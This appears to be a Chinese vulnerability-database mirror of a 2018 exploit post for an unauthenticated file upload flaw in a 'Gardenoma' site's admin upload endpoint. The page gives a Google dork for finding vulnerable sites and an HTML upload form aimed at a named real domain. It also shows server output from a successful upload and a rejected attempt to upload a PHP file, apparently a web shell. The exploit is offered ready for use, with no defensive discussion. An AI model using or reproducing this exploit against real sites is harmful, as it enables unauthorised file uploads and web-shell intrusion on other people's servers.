Gardenoma Remote File Upload Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209759 漏洞类型
发布时间 2018-06-11 更新时间 2018-06-11
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060107
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:  Gardenoma Remote File Upload Vulnerability
# Google Dork: intext:gardenoma happy planting.
# Exploit Author: Mr.T959
# Author Website : http://mr-t959.xyz
# Tested on: Windows 7
--------------------------------------

# Exploit HTML Code :
<form method='post' target='_blank' action='http://gardenoma.com/admin/server/php/' enctype='multipart/form-data'>
<input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>

# Exploit 
admin/server/php/

# Successful 
{"files":[{"name":"e.jpg","size":5362,"type":"image\/jpeg","title":null,"description":null,"url":"http:\/\/gardenoma.com\/admin\/server\/php\/files\/\/e.jpg","mediumUrl":"http:\/\/gardenoma.com\/admin\/server\/php\/files\/\/medium\/e.jpg","thumbnailUrl":"http:\/\/gardenoma.com\/admin\/server\/php\/files\/\/thumbnail\/e.jpg","deleteUrl":"http:\/\/gardenoma.com\/admin\/server\/php\/?file=e.jpg&_method=DELETE","deleteType":"POST","id":1688}]}<br />
<b>Warning</b>:  Unknown: The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in <b>Unknown</b> on line <b>0</b><br />
<br />
<b>Warning</b>:  Unknown: Failed to write session data (files). Please verify that the current setting of session.save_path is correct (/tmp) in <b>Unknown</b> on line <b>0</b><br />

# Error
{"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]}

# Demo
http://gardenoma.com/admin/server/php/